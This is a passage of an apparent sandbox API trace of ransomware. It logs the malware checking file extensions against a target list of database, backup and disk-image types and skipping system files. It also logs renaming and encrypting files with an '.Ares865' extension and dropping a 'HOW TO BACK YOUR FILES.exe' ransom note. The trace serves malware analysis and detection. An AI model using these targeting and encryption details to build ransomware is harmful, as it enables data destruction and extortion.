lstrlenW (lpString="fmpsl") returned 5 [0058.099] lstrcmpiW (lpString1="p.ini", lpString2="fmpsl") returned 1 [0058.099] lstrlenW (lpString="fol") returned 3 [0058.099] lstrcmpiW (lpString1="ini", lpString2="fol") returned 1 [0058.099] lstrlenW (lpString="fp3") returned 3 [0058.099] lstrcmpiW (lpString1="ini", lpString2="fp3") returned 1 [0058.099] lstrlenW (lpString="fp4") returned 3 [0058.099] lstrcmpiW (lpString1="ini", lpString2="fp4") returned 1 [0058.099] lstrlenW (lpString="fp5") returned 3 [0058.099] lstrcmpiW (lpString1="ini", lpString2="fp5") returned 1 [0058.100] lstrlenW (lpString="fp7") returned 3 [0058.100] lstrcmpiW (lpString1="ini", lpString2="fp7") returned 1 [0058.100] lstrlenW (lpString="fpt") returned 3 [0058.100] lstrcmpiW (lpString1="ini", lpString2="fpt") returned 1 [0058.100] lstrlenW (lpString="frm") returned 3 [0058.100] lstrcmpiW (lpString1="ini", lpString2="frm") returned 1 [0058.100] lstrlenW (lpString="gdb") returned 3 [0058.100] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0058.100] lstrlenW (lpString="gdb") returned 3 [0058.100] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0058.100] lstrlenW (lpString="grdb") returned 4 [0058.100] lstrcmpiW (lpString1=".ini", lpString2="grdb") returned -1 [0058.100] lstrlenW (lpString="gwi") returned 3 [0058.100] lstrcmpiW (lpString1="ini", lpString2="gwi") returned 1 [0058.100] lstrlenW (lpString="hdb") returned 3 [0058.100] lstrcmpiW (lpString1="ini", lpString2="hdb") returned 1 [0058.100] lstrlenW (lpString="his") returned 3 [0058.100] lstrcmpiW (lpString1="ini", lpString2="his") returned 1 [0058.100] lstrlenW (lpString="ib") returned 2 [0058.100] lstrcmpiW (lpString1="ni", lpString2="ib") returned 1 [0058.100] lstrlenW (lpString="idb") returned 3 [0058.100] lstrcmpiW (lpString1="ini", lpString2="idb") returned 1 [0058.100] lstrlenW (lpString="ihx") returned 3 [0058.100] lstrcmpiW (lpString1="ini", lpString2="ihx") returned 1 [0058.100] lstrlenW (lpString="itdb") returned 4 [0058.100] lstrcmpiW (lpString1=".ini", lpString2="itdb") returned -1 [0058.100] lstrlenW (lpString="itw") returned 3 [0058.100] lstrcmpiW (lpString1="ini", lpString2="itw") returned -1 [0058.100] lstrlenW (lpString="jet") returned 3 [0058.100] lstrcmpiW (lpString1="ini", lpString2="jet") returned -1 [0058.100] lstrlenW (lpString="jtx") returned 3 [0058.100] lstrcmpiW (lpString1="ini", lpString2="jtx") returned -1 [0058.100] lstrlenW (lpString="kdb") returned 3 [0058.100] lstrcmpiW (lpString1="ini", lpString2="kdb") returned -1 [0058.100] lstrlenW (lpString="kexi") returned 4 [0058.100] lstrcmpiW (lpString1=".ini", lpString2="kexi") returned -1 [0058.100] lstrlenW (lpString="kexic") returned 5 [0058.100] lstrcmpiW (lpString1="p.ini", lpString2="kexic") returned 1 [0058.101] lstrlenW (lpString="kexis") returned 5 [0058.101] lstrcmpiW (lpString1="p.ini", lpString2="kexis") returned 1 [0058.101] lstrlenW (lpString="lgc") returned 3 [0058.101] lstrcmpiW (lpString1="ini", lpString2="lgc") returned -1 [0058.101] lstrlenW (lpString="lwx") returned 3 [0058.101] lstrcmpiW (lpString1="ini", lpString2="lwx") returned -1 [0058.101] lstrlenW (lpString="maf") returned 3 [0058.101] lstrcmpiW (lpString1="ini", lpString2="maf") returned -1 [0058.101] lstrlenW (lpString="maq") returned 3 [0058.101] lstrcmpiW (lpString1="ini", lpString2="maq") returned -1 [0058.101] lstrlenW (lpString="mar") returned 3 [0058.101] lstrcmpiW (lpString1="ini", lpString2="mar") returned -1 [0058.101] lstrlenW (lpString="marshal") returned 7 [0058.101] lstrcmpiW (lpString1="top.ini", lpString2="marshal") returned 1 [0058.101] lstrlenW (lpString="mas") returned 3 [0058.101] lstrcmpiW (lpString1="ini", lpString2="mas") returned -1 [0058.101] lstrlenW (lpString="mav") returned 3 [0058.101] lstrcmpiW (lpString1="ini", lpString2="mav") returned -1 [0058.101] lstrlenW (lpString="maw") returned 3 [0058.101] lstrcmpiW (lpString1="ini", lpString2="maw") returned -1 [0058.101] lstrlenW (lpString="mdbhtml") returned 7 [0058.101] lstrcmpiW (lpString1="top.ini", lpString2="mdbhtml") returned 1 [0058.101] lstrlenW (lpString="mdn") returned 3 [0058.101] lstrcmpiW (lpString1="ini", lpString2="mdn") returned -1 [0058.101] lstrlenW (lpString="mdt") returned 3 [0058.101] lstrcmpiW (lpString1="ini", lpString2="mdt") returned -1 [0058.101] lstrlenW (lpString="mfd") returned 3 [0058.101] lstrcmpiW (lpString1="ini", lpString2="mfd") returned -1 [0058.101] lstrlenW (lpString="mpd") returned 3 [0058.101] lstrcmpiW (lpString1="ini", lpString2="mpd") returned -1 [0058.101] lstrlenW (lpString="mrg") returned 3 [0058.101] lstrcmpiW (lpString1="ini", lpString2="mrg") returned -1 [0058.101] lstrlenW (lpString="mud") returned 3 [0058.101] lstrcmpiW (lpString1="ini", lpString2="mud") returned -1 [0058.101] lstrlenW (lpString="mwb") returned 3 [0058.101] lstrcmpiW (lpString1="ini", lpString2="mwb") returned -1 [0058.101] lstrlenW (lpString="myd") returned 3 [0058.101] lstrcmpiW (lpString1="ini", lpString2="myd") returned -1 [0058.102] lstrlenW (lpString="ndf") returned 3 [0058.102] lstrcmpiW (lpString1="ini", lpString2="ndf") returned -1 [0058.102] lstrlenW (lpString="nnt") returned 3 [0058.102] lstrcmpiW (lpString1="ini", lpString2="nnt") returned -1 [0058.102] lstrlenW (lpString="nrmlib") returned 6 [0058.102] lstrcmpiW (lpString1="op.ini", lpString2="nrmlib") returned 1 [0058.102] lstrlenW (lpString="ns2") returned 3 [0058.102] lstrcmpiW (lpString1="ini", lpString2="ns2") returned -1 [0058.102] lstrlenW (lpString="ns3") returned 3 [0058.102] lstrcmpiW (lpString1="ini", lpString2="ns3") returned -1 [0058.102] lstrlenW (lpString="ns4") returned 3 [0058.102] lstrcmpiW (lpString1="ini", lpString2="ns4") returned -1 [0058.102] lstrlenW (lpString="nsf") returned 3 [0058.102] lstrcmpiW (lpString1="ini", lpString2="nsf") returned -1 [0058.102] lstrlenW (lpString="nv") returned 2 [0058.102] lstrcmpiW (lpString1="ni", lpString2="nv") returned -1 [0058.102] lstrlenW (lpString="nv2") returned 3 [0058.102] lstrcmpiW (lpString1="ini", lpString2="nv2") returned -1 [0058.102] lstrlenW (lpString="nwdb") returned 4 [0058.102] lstrcmpiW (lpString1=".ini", lpString2="nwdb") returned -1 [0058.102] lstrlenW (lpString="nyf") returned 3 [0058.102] lstrcmpiW (lpString1="ini", lpString2="nyf") returned -1 [0058.102] lstrlenW (lpString="odb") returned 3 [0058.102] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0058.102] lstrlenW (lpString="odb") returned 3 [0058.102] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0058.102] lstrlenW (lpString="oqy") returned 3 [0058.102] lstrcmpiW (lpString1="ini", lpString2="oqy") returned -1 [0058.102] lstrlenW (lpString="ora") returned 3 [0058.102] lstrcmpiW (lpString1="ini", lpString2="ora") returned -1 [0058.102] lstrlenW (lpString="orx") returned 3 [0058.102] lstrcmpiW (lpString1="ini", lpString2="orx") returned -1 [0058.102] lstrlenW (lpString="owc") returned 3 [0058.102] lstrcmpiW (lpString1="ini", lpString2="owc") returned -1 [0058.102] lstrlenW (lpString="p96") returned 3 [0058.102] lstrcmpiW (lpString1="ini", lpString2="p96") returned -1 [0058.102] lstrlenW (lpString="p97") returned 3 [0058.102] lstrcmpiW (lpString1="ini", lpString2="p97") returned -1 [0058.103] lstrlenW (lpString="pan") returned 3 [0058.103] lstrcmpiW (lpString1="ini", lpString2="pan") returned -1 [0058.103] lstrlenW (lpString="pdb") returned 3 [0058.103] lstrcmpiW (lpString1="ini", lpString2="pdb") returned -1 [0058.103] lstrlenW (lpString="pdm") returned 3 [0058.103] lstrcmpiW (lpString1="ini", lpString2="pdm") returned -1 [0058.103] lstrlenW (lpString="pnz") returned 3 [0058.103] lstrcmpiW (lpString1="ini", lpString2="pnz") returned -1 [0058.103] lstrlenW (lpString="qry") returned 3 [0058.103] lstrcmpiW (lpString1="ini", lpString2="qry") returned -1 [0058.103] lstrlenW (lpString="qvd") returned 3 [0058.103] lstrcmpiW (lpString1="ini", lpString2="qvd") returned -1 [0058.103] lstrlenW (lpString="rbf") returned 3 [0058.103] lstrcmpiW (lpString1="ini", lpString2="rbf") returned -1 [0058.103] lstrlenW (lpString="rctd") returned 4 [0058.103] lstrcmpiW (lpString1=".ini", lpString2="rctd") returned -1 [0058.103] lstrlenW (lpString="rod") returned 3 [0058.103] lstrcmpiW (lpString1="ini", lpString2="rod") returned -1 [0058.103] lstrlenW (lpString="rodx") returned 4 [0058.103] lstrcmpiW (lpString1=".ini", lpString2="rodx") returned -1 [0058.103] lstrlenW (lpString="rpd") returned 3 [0058.103] lstrcmpiW (lpString1="ini", lpString2="rpd") returned -1 [0058.103] lstrlenW (lpString="rsd") returned 3 [0058.103] lstrcmpiW (lpString1="ini", lpString2="rsd") returned -1 [0058.103] lstrlenW (lpString="sas7bdat") returned 8 [0058.103] lstrcmpiW (lpString1="ktop.ini", lpString2="sas7bdat") returned -1 [0058.103] lstrlenW (lpString="sbf") returned 3 [0058.103] lstrcmpiW (lpString1="ini", lpString2="sbf") returned -1 [0058.103] lstrlenW (lpString="scx") returned 3 [0058.103] lstrcmpiW (lpString1="ini", lpString2="scx") returned -1 [0058.103] lstrlenW (lpString="sdb") returned 3 [0058.103] lstrcmpiW (lpString1="ini", lpString2="sdb") returned -1 [0058.103] lstrlenW (lpString="sdc") returned 3 [0058.103] lstrcmpiW (lpString1="ini", lpString2="sdc") returned -1 [0058.103] lstrlenW (lpString="sdf") returned 3 [0058.103] lstrcmpiW (lpString1="ini", lpString2="sdf") returned -1 [0058.103] lstrlenW (lpString="sis") returned 3 [0058.103] lstrcmpiW (lpString1="ini", lpString2="sis") returned -1 [0058.104] lstrlenW (lpString="spq") returned 3 [0058.104] lstrcmpiW (lpString1="ini", lpString2="spq") returned -1 [0058.104] lstrlenW (lpString="te") returned 2 [0058.104] lstrcmpiW (lpString1="ni", lpString2="te") returned -1 [0058.104] lstrlenW (lpString="teacher") returned 7 [0058.104] lstrcmpiW (lpString1="top.ini", lpString2="teacher") returned 1 [0058.104] lstrlenW (lpString="tmd") returned 3 [0058.104] lstrcmpiW (lpString1="ini", lpString2="tmd") returned -1 [0058.104] lstrlenW (lpString="tps") returned 3 [0058.104] lstrcmpiW (lpString1="ini", lpString2="tps") returned -1 [0058.104] lstrlenW (lpString="trc") returned 3 [0058.104] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 [0058.104] lstrlenW (lpString="trc") returned 3 [0058.104] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 [0058.104] lstrlenW (lpString="trm") returned 3 [0058.104] lstrcmpiW (lpString1="ini", lpString2="trm") returned -1 [0058.104] lstrlenW (lpString="udb") returned 3 [0058.104] lstrcmpiW (lpString1="ini", lpString2="udb") returned -1 [0058.104] lstrlenW (lpString="udl") returned 3 [0058.104] lstrcmpiW (lpString1="ini", lpString2="udl") returned -1 [0058.104] lstrlenW (lpString="usr") returned 3 [0058.104] lstrcmpiW (lpString1="ini", lpString2="usr") returned -1 [0058.104] lstrlenW (lpString="v12") returned 3 [0058.104] lstrcmpiW (lpString1="ini", lpString2="v12") returned -1 [0058.104] lstrlenW (lpString="vis") returned 3 [0058.104] lstrcmpiW (lpString1="ini", lpString2="vis") returned -1 [0058.104] lstrlenW (lpString="vpd") returned 3 [0058.104] lstrcmpiW (lpString1="ini", lpString2="vpd") returned -1 [0058.104] lstrlenW (lpString="vvv") returned 3 [0058.104] lstrcmpiW (lpString1="ini", lpString2="vvv") returned -1 [0058.104] lstrlenW (lpString="wdb") returned 3 [0058.105] lstrcmpiW (lpString1="ini", lpString2="wdb") returned -1 [0058.105] lstrlenW (lpString="wmdb") returned 4 [0058.105] lstrcmpiW (lpString1=".ini", lpString2="wmdb") returned -1 [0058.105] lstrlenW (lpString="wrk") returned 3 [0058.105] lstrcmpiW (lpString1="ini", lpString2="wrk") returned -1 [0058.105] lstrlenW (lpString="xdb") returned 3 [0058.105] lstrcmpiW (lpString1="ini", lpString2="xdb") returned -1 [0058.105] lstrlenW (lpString="xld") returned 3 [0058.105] lstrcmpiW (lpString1="ini", lpString2="xld") returned -1 [0058.105] lstrlenW (lpString="xmlff") returned 5 [0058.105] lstrcmpiW (lpString1="p.ini", lpString2="xmlff") returned -1 [0058.105] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Start Menu\\Programs\\Startup\\desktop.ini.Ares865") returned 69 [0058.105] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Start Menu\\Programs\\Startup\\desktop.ini" (normalized: "c:\\users\\default user\\start menu\\programs\\startup\\desktop.ini"), lpNewFileName="C:\\Users\\Default User\\Start Menu\\Programs\\Startup\\desktop.ini.Ares865" (normalized: "c:\\users\\default user\\start menu\\programs\\startup\\desktop.ini.ares865"), dwFlags=0x1) returned 1 [0058.107] CreateFileW (lpFileName="C:\\Users\\Default User\\Start Menu\\Programs\\Startup\\desktop.ini.Ares865" (normalized: "c:\\users\\default user\\start menu\\programs\\startup\\desktop.ini.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0058.107] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=174) returned 1 [0058.108] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0058.108] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0058.108] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0058.108] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f02f8) returned 1 [0058.109] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0058.109] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0058.109] CreateFileMappingW (hFile=0x15c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x3b0, lpName=0x0) returned 0x154 [0058.111] MapViewOfFile (hFileMappingObject=0x154, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3b0) returned 0x190000 [0058.111] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f02f8) returned 1 [0058.112] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0058.112] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0058.112] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d31c0 [0058.112] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d31c0 | out: hHeap=0x2b0000) returned 1 [0058.112] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0058.112] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0058.112] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0058.112] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0058.112] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d5ee0 [0058.113] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0058.113] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d5ee0 | out: hHeap=0x2b0000) returned 1 [0058.113] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0058.113] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0058.113] CloseHandle (hObject=0x154) returned 1 [0058.113] CloseHandle (hObject=0x15c) returned 1 [0058.114] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 [0058.114] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0058.114] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0058.114] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49d25ee0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x49d25ee0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0058.114] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0058.114] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49d25ee0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x49d25ee0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0058.114] FindClose (in: hFindFile=0x2ccde8 | out: hFindFile=0x2ccde8) returned 1 [0058.114] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2d23c8 [0058.114] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Start Menu\\Programs\\Maintenance", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Start Menu\\Programs\\Maintenance") returned="C:\\Users\\Default User\\Start Menu\\Programs\\Maintenance" [0058.115] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d30d0 | out: hHeap=0x2b0000) returned 1 [0058.115] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d23c0 | out: hHeap=0x2b0000) returned 1 [0058.115] lstrlenW (lpString="C:\\Users\\Default User\\Start Menu\\Programs\\Maintenance") returned 53 [0058.115] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Start Menu\\Programs\\Maintenance" | out: lpString1="C:\\Users\\Default User\\Start Menu\\Programs\\Maintenance") returned="C:\\Users\\Default User\\Start Menu\\Programs\\Maintenance" [0058.115] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0058.115] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Start Menu\\Programs\\Maintenance\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\start menu\\programs\\maintenance\\how to back your files.exe"), bFailIfExists=1) returned 0 [0058.115] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0058.115] GetLastError () returned 0x0 [0058.115] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0058.115] ReadFile (in: hFile=0x118, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0058.115] CloseHandle (hObject=0x118) returned 1 [0058.116] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0058.116] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0058.116] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Start Menu\\Programs\\Maintenance\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfda4e0ba, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x49d25ee0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49d25ee0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0058.116] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0058.116] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0058.116] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0058.116] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfda4e0ba, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x49d25ee0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49d25ee0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.116] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0058.116] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0058.116] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0058.116] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0058.116] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xec165d69, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x642afa0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x7e05e94e, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x13e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desktop.ini", cAlternateFileName="")) returned 1 [0058.116] lstrcmpiW (lpString1="Desktop.ini", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0058.116] lstrcmpiW (lpString1="Desktop.ini", lpString2="aoldtz.exe") returned 1 [0058.116] lstrcmpiW (lpString1="Desktop.ini", lpString2=".") returned 1 [0058.116] lstrcmpiW (lpString1="Desktop.ini", lpString2="..") returned 1 [0058.116] lstrcmpiW (lpString1="Desktop.ini", lpString2="windows") returned -1 [0058.116] lstrcmpiW (lpString1="Desktop.ini", lpString2="bootmgr") returned 1 [0058.116] lstrcmpiW (lpString1="Desktop.ini", lpString2="temp") returned -1 [0058.116] lstrcmpiW (lpString1="Desktop.ini", lpString2="pagefile.sys") returned -1 [0058.116] lstrcmpiW (lpString1="Desktop.ini", lpString2="boot") returned 1 [0058.116] lstrcmpiW (lpString1="Desktop.ini", lpString2="ids.txt") returned -1 [0058.116] lstrcmpiW (lpString1="Desktop.ini", lpString2="ntuser.dat") returned -1 [0058.116] lstrcmpiW (lpString1="Desktop.ini", lpString2="perflogs") returned -1 [0058.116] lstrcmpiW (lpString1="Desktop.ini", lpString2="MSBuild") returned -1 [0058.116] lstrlenW (lpString="Desktop.ini") returned 11 [0058.116] lstrlenW (lpString="C:\\Users\\Default User\\Start Menu\\Programs\\Maintenance\\*") returned 55 [0058.116] lstrcpyW (in: lpString1=0x2cce46c, lpString2="Desktop.ini" | out: lpString1="Desktop.ini") returned="Desktop.ini" [0058.116] lstrlenW (lpString="Desktop.ini") returned 11 [0058.116] lstrlenW (lpString="Ares865") returned 7 [0058.117] lstrcmpiW (lpString1="top.ini", lpString2="Ares865") returned 1 [0058.117] lstrlenW (lpString=".dll") returned 4 [0058.117] lstrcmpiW (lpString1="Desktop.ini", lpString2=".dll") returned 1 [0058.117] lstrlenW (lpString=".lnk") returned 4 [0058.117] lstrcmpiW (lpString1="Desktop.ini", lpString2=".lnk") returned 1 [0058.117] lstrlenW (lpString=".ini") returned 4 [0058.117] lstrcmpiW (lpString1="Desktop.ini", lpString2=".ini") returned 1 [0058.117] lstrlenW (lpString=".sys") returned 4 [0058.117] lstrcmpiW (lpString1="Desktop.ini", lpString2=".sys") returned 1 [0058.117] lstrlenW (lpString="Desktop.ini") returned 11 [0058.117] lstrlenW (lpString="bak") returned 3 [0058.117] lstrcmpiW (lpString1="ini", lpString2="bak") returned 1 [0058.117] lstrlenW (lpString="ba_") returned 3 [0058.117] lstrcmpiW (lpString1="ini", lpString2="ba_") returned 1 [0058.117] lstrlenW (lpString="dbb") returned 3 [0058.117] lstrcmpiW (lpString1="ini", lpString2="dbb") returned 1 [0058.117] lstrlenW (lpString="vmdk") returned 4 [0058.117] lstrcmpiW (lpString1=".ini", lpString2="vmdk") returned -1 [0058.117] lstrlenW (lpString="rar") returned 3 [0058.117] lstrcmpiW (lpString1="ini", lpString2="rar") returned -1 [0058.117] lstrlenW (lpString="zip") returned 3 [0058.117] lstrcmpiW (lpString1="ini", lpString2="zip") returned -1 [0058.117] lstrlenW (lpString="tgz") returned 3 [0058.117] lstrcmpiW (lpString1="ini", lpString2="tgz") returned -1 [0058.117] lstrlenW (lpString="vbox") returned 4 [0058.117] lstrcmpiW (lpString1=".ini", lpString2="vbox") returned -1 [0058.117] lstrlenW (lpString="vdi") returned 3 [0058.117] lstrcmpiW (lpString1="ini", lpString2="vdi") returned -1 [0058.117] lstrlenW (lpString="vhd") returned 3 [0058.117] lstrcmpiW (lpString1="ini", lpString2="vhd") returned -1 [0058.117] lstrlenW (lpString="vhdx") returned 4 [0058.117] lstrcmpiW (lpString1=".ini", lpString2="vhdx") returned -1 [0058.117] lstrlenW (lpString="avhd") returned 4 [0058.117] lstrcmpiW (lpString1=".ini", lpString2="avhd") returned -1 [0058.117] lstrlenW (lpString="db") returned 2 [0058.117] lstrcmpiW (lpString1="ni", lpString2="db") returned 1 [0058.117] lstrlenW (lpString="db2") returned 3 [0058.117] lstrcmpiW (lpString1="ini", lpString2="db2") returned 1 [0058.117] lstrlenW (lpString="db3") returned 3 [0058.118] lstrcmpiW (lpString1="ini", lpString2="db3") returned 1 [0058.118] lstrlenW (lpString="dbf") returned 3 [0058.118] lstrcmpiW (lpString1="ini", lpString2="dbf") returned 1 [0058.118] lstrlenW (lpString="mdf") returned 3 [0058.118] lstrcmpiW (lpString1="ini", lpString2="mdf") returned -1 [0058.118] lstrlenW (lpString="mdb") returned 3 [0058.118] lstrcmpiW (lpString1="ini", lpString2="mdb") returned -1 [0058.118] lstrlenW (lpString="sql") returned 3 [0058.118] lstrcmpiW (lpString1="ini", lpString2="sql") returned -1 [0058.118] lstrlenW (lpString="sqlite") returned 6 [0058.118] lstrcmpiW (lpString1="op.ini", lpString2="sqlite") returned -1 [0058.118] lstrlenW (lpString="sqlite3") returned 7 [0058.118] lstrcmpiW (lpString1="top.ini", lpString2="sqlite3") returned 1 [0058.118] lstrlenW (lpString="sqlitedb") returned 8 [0058.118] lstrcmpiW (lpString1="ktop.ini", lpString2="sqlitedb") returned -1 [0058.118] lstrlenW (lpString="xml") returned 3 [0058.118] lstrcmpiW (lpString1="ini", lpString2="xml") returned -1 [0058.118] lstrlenW (lpString="$er") returned 3 [0058.118] lstrcmpiW (lpString1="ini", lpString2="$er") returned 1 [0058.118] lstrlenW (lpString="4dd") returned 3 [0058.118] lstrcmpiW (lpString1="ini", lpString2="4dd") returned 1 [0058.118] lstrlenW (lpString="4dl") returned 3 [0058.118] lstrcmpiW (lpString1="ini", lpString2="4dl") returned 1 [0058.118] lstrlenW (lpString="^^^") returned 3 [0058.118] lstrcmpiW (lpString1="ini", lpString2="^^^") returned 1 [0058.118] lstrlenW 